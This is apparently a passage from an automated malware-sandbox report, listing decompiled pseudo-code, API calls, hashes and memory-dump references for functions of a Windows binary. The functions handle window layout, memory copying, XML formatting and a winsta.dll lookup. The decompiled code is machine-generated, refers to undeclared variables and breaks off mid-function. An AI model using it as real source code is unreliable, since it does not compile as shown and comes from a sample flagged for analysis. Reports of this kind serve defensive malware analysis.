                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                      • free.MSVCRT(00000000), ref: 00406839
                                                                                        • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??3@$free
                                                                                      • String ID:
                                                                                      • API String ID: 2241099983-0
                                                                                      • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                      • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                      • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                      • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                                      0x00405d03
                                                                                      0x00405d06
                                                                                      0x00405d10
                                                                                      0x00405d17
                                                                                      0x00405d22
                                                                                      0x00405d32
                                                                                      0x00405d40
                                                                                      0x00405d48
                                                                                      0x00405d4e
                                                                                      0x00405d54
                                                                                      0x00405d59
                                                                                      0x00405d5c
                                                                                      0x00405d61
                                                                                      0x00405d67

                                                                                      APIs
                                                                                      • GetParent.USER32(?), ref: 00405D0A
                                                                                      • GetWindowRect.USER32 ref: 00405D17
                                                                                      • GetClientRect.USER32 ref: 00405D22
                                                                                      • MapWindowPoints.USER32 ref: 00405D32
                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                      • String ID:
                                                                                      • API String ID: 4247780290-0
                                                                                      • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                      • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                      • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                      • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 89%
                                                                                      			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                                      0x004083dc
                                                                                      0x004083e2
                                                                                      0x004083e9
                                                                                      0x004083ea
                                                                                      0x004083eb
                                                                                      0x004083f3
                                                                                      0x004083f6
                                                                                      0x004083f8
                                                                                      0x00408401
                                                                                      0x00408404
                                                                                      0x00408407
                                                                                      0x00408409
                                                                                      0x0040840c
                                                                                      0x00408413
                                                                                      0x0040841d
                                                                                      0x00408427
                                                                                      0x0040842c
                                                                                      0x0040842f
                                                                                      0x00408432
                                                                                      0x00408435
                                                                                      0x00408438
                                                                                      0x00408439
                                                                                      0x0040843e
                                                                                      0x0040843f
                                                                                      0x00408442
                                                                                      0x0040844a

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memcpy$??2@??3@
                                                                                      • String ID:
                                                                                      • API String ID: 1252195045-0
                                                                                      • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                      • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                      • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                      • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 76%
                                                                                      			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                                      0x00406746
                                                                                      0x00406746
                                                                                      0x0040674f
                                                                                      0x00406751
                                                                                      0x00406752
                                                                                      0x00406757
                                                                                      0x00406758
                                                                                      0x0040675d
                                                                                      0x0040675f
                                                                                      0x00406760
                                                                                      0x00406765
                                                                                      0x00406766
                                                                                      0x0040676e
                                                                                      0x00406770
                                                                                      0x00406771
                                                                                      0x00406776
                                                                                      0x00406777
                                                                                      0x0040677f
                                                                                      0x00406781
                                                                                      0x00406785
                                                                                      0x00406787
                                                                                      0x00406788
                                                                                      0x0040678e
                                                                                      0x0040678e
                                                                                      0x00406790
                                                                                      0x00406791
                                                                                      0x00406796
                                                                                      0x00406798
                                                                                      0x0040679e
                                                                                      0x004067a1
                                                                                      0x004067a4
                                                                                      0x004067ab

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??3@
                                                                                      • String ID:
                                                                                      • API String ID: 613200358-0
                                                                                      • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                      • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                      • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                      • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 87%
                                                                                      			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                                      0x0040aba8
                                                                                      0x0040aba9
                                                                                      0x0040abb0
                                                                                      0x0040abb2
                                                                                      0x0040abb5
                                                                                      0x0040ac19
                                                                                      0x0040ac2c
                                                                                      0x0040ac2e
                                                                                      0x0040ac36
                                                                                      0x0040ac39
                                                                                      0x0040ac39
                                                                                      0x0040ac1b
                                                                                      0x0040ac21
                                                                                      0x0040ac21
                                                                                      0x0040abb7
                                                                                      0x0040abcb
                                                                                      0x0040abce
                                                                                      0x0040abd7
                                                                                      0x0040abe6
                                                                                      0x0040abf6
                                                                                      0x0040abfe
                                                                                      0x0040ac09
                                                                                      0x0040ac0f
                                                                                      0x0040ac12
                                                                                      0x0040ac4f

                                                                                      APIs
                                                                                      • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                        • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                        • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                        • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                      • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                      • String ID: $
                                                                                      • API String ID: 2498372239-3993045852
                                                                                      • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                      • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                      • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                      • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                                      0x00403a7d
                                                                                      0x00403a8c
                                                                                      0x00403a9c
                                                                                      0x00403aba
                                                                                      0x00403adf
                                                                                      0x00403ae7
                                                                                      0x00403af4
                                                                                      0x00403af4
                                                                                      0x00403ae7
                                                                                      0x00403aba
                                                                                      0x00403a9c
                                                                                      0x00403b13

                                                                                      APIs
                                                                                      • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                        • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                      • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: State$CallMessageProcSendWindow
                                                                                      • String ID: A
                                                                                      • API String ID: 3924021322-3554254475
                                                                                      • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                      • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                      • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                      • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 91%
                                                                                      			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                                      0x004034f0
                                                                                      0x004034f8
                                                                                      0x00403506
                                                                                      0x00403516
                                                                                      0x0040351c
                                                                                      0x00403531
                                                                                      0x00403537
                                                                                      0x00403545
                                                                                      0x0040354a
                                                                                      0x00403556
                                                                                      0x00403567
                                                                                      0x00403575
                                                                                      0x00403583
                                                                                      0x00403583
                                                                                      0x00403586
                                                                                      0x00403592
                                                                                      0x00403598
                                                                                      0x004035ac

                                                                                      APIs
                                                                                        • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                        • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                      • memset.MSVCRT ref: 00403537
                                                                                      • _ultow.MSVCRT ref: 00403575
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??2@$memset$_ultow
                                                                                      • String ID: cf@$q
                                                                                      • API String ID: 3448780718-2693627795
                                                                                      • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                      • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                      • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                      • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 64%
                                                                                      			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                                      0x00407e2d
                                                                                      0x00407e46
                                                                                      0x00407e48
                                                                                      0x00407e4d
                                                                                      0x00407e5f
                                                                                      0x00407e6b
                                                                                      0x00407e6f
                                                                                      0x00407e75
                                                                                      0x00407e7c
                                                                                      0x00407e7d
                                                                                      0x00407e88
                                                                                      0x00407e8d
                                                                                      0x00407e8e
                                                                                      0x00407eaa

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00407E48
                                                                                      • memset.MSVCRT ref: 00407E5F
                                                                                        • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                        • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                      • _snwprintf.MSVCRT ref: 00407E8E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                      • String ID: </%s>
                                                                                      • API String ID: 3400436232-259020660
                                                                                      • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                      • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                      • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                      • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 77%
                                                                                      			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                                      0x00405e0a
                                                                                      0x00405e12
                                                                                      0x00405e18
                                                                                      0x00405e1c
                                                                                      0x00405e1e
                                                                                      0x00405e1e
                                                                                      0x00405e24
                                                                                      0x00405e2c
                                                                                      0x00405e2e
                                                                                      0x00405e44
                                                                                      0x00405e49
                                                                                      0x00405e4c
                                                                                      0x00405e4d
                                                                                      0x00405e68
                                                                                      0x00405e74
                                                                                      0x00405e74
                                                                                      0x00000000
                                                                                      0x00405e84
                                                                                      0x00405e8c

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                      • String ID: caption
                                                                                      • API String ID: 1523050162-4135340389
                                                                                      • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                      • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                      • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                      • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                      0x00409a4a
                                                                                      0x00409a4f
                                                                                      0x00409a56
                                                                                      0x00409a5e
                                                                                      0x00409a60
                                                                                      0x00409a6e
                                                                                      0x00409a6e
                                                                                      0x00409a60
                                                                                      0x00409a71
                                                                                      0x00409a76
                                                                                      0x00000000
                                                                                      0x00409a78
                                                                                      0x00000000
                                                                                      0x00409a89

                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                      • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                      • API String ID: 946536540-379566740
                                                                                      • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                      • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                      • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                      • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 93%
                                                                                      			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
